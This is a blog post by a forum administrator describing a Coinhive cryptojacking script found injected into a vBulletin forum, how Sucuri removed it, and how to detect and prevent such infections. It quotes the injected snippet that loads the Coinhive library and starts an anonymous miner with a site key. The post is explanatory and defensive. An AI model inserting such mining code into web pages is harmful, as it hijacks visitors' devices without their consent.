What to do if Coinhive crypto-mining script infects your website
I have been reading about website owners using scripts on their websites that use the CPU of the visitor’s computer when they visit their website. The idea is to monetize their content – and so instead of using ads, they use a script that runs in the browser and uses the user’s computer resources to mine cryptocurrency. But I used to think that only website owners did this by design – I never imagined that hackers would hack websites and push the script on to others websites and use their visitors CPU to make money for themselves. But this is what seems to be happening now!
Coinhive crypto-mining script
Yesterday when I visited our TWC Forum, which runs on vBulletin software, my security software threw up this warning:
https:// coinhive dot com /lib/coinhive.js Object file detected, download blocked
I usually visit the forum everyday and I hadn’t seen it the day before. So I assume that this had happened some time during the night, my time, when I was sleeping.
I use vBulletin software for the forum, and it was updated to the latest version. Moreover, this was quite surprising for us, as TheWindowsClub.com domain uses Sucuri Web Antivirus & Firewall to protect itself from online web threats & attacks.
My PC security software successfully stopped the malicious script from running on my Windows 10 computer. I checked with other browsers like Chrome & Edge, and the results were the same.
After right-clicking on the forum web page and checking the source code, I found that it was a CryptoMiner malicious script of CoinHive.
<script src="https:// coinhive dot com /lib/coinhive.min.js"></script><script>var miner =new CoinHive.Anonymous("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm");miner.start();</script>
Anyway, the first thing I did was to take the forum down and inform Sucuri.
The Sucuri folks cleaned the forum of the Coinhive script which had got pushed into my forum in a few hours, and all was fine.
What is CoinHive
This is called Cryptojacking. It involves hijacking the users’ browsers for cryptocurrency mining. Some website owners may use it themselves to make money – but in our case, it had got injected.
Now if your browser is infected you will see your resource utilization go up. Close the browser, and it will drop. The user may notice his machine heating up, the fan running fast or the battery draining fast.
I asked my colleague Saurabh Mukhekar to visit my forum using his Mac and see what happened. Well, his Mac computer was affected too when he opened the forum with Safari! He is one of those smart Mac OSX users who uses an antivirus software for his Mac. His Avast antivirus for Mac successfully stopped the malicious script from running.
Prevent CoinHive from infecting your website
Don’t use any NULL templates or plugins on your website/forum.
Keep your CMS updated to the latest version.
Update your hosting software regularly (PHP, Database, etc.. ).
First of all, you need to be the webmaster of the infected website – or have administrative credentials that give you access to all the website files.
Now when your antivirus detects the CoinHive infection, right-click on the web page and select View Source Code. Next press Ctrl+F and search for “CoinHive”.
Once you have identified the location of the malicious code, you need to see its position – where is it located. Now you need to remove it manually. To do this, you need a bit of coding knowledge of your platform. You will have to locate the infected file/s and manually remove above script from it. If you are not sure about it, please ask some expert to do it. Since we use Sucuri, we let them do it.
Having done that, clear your server & browser cache. If you are using any cache plugin or say MaxCDN, clear those caches too.
Protect yourself against crypto mining scripts
Cryptocurrencies & Blockchain technology is taking over the world. It is creating an impact on the global economy and causing technology disruptions as well. Everyone has started focusing on such a lucrative market – and this includes website hackers too. As returns increase, we should expect that such technologies will be misused. That’s the dark side of any emerging technology.
As a matter of abundant precaution, if you ever feel that you may have visited an infected site, it would be a good idea to clear your browser cache and scan your machine with your antivirus software as well as AdwCleaner.
Anand Khanse is the Admin of TheWindowsClub.com, a 10-year Microsoft MVP Awardee in Windows (2006-16) & a Windows Insider MVP since then. Please read the entire post & the comments first, create a System Restore Point before making any changes to your system & be careful about any 3rd-party offers while installing freeware.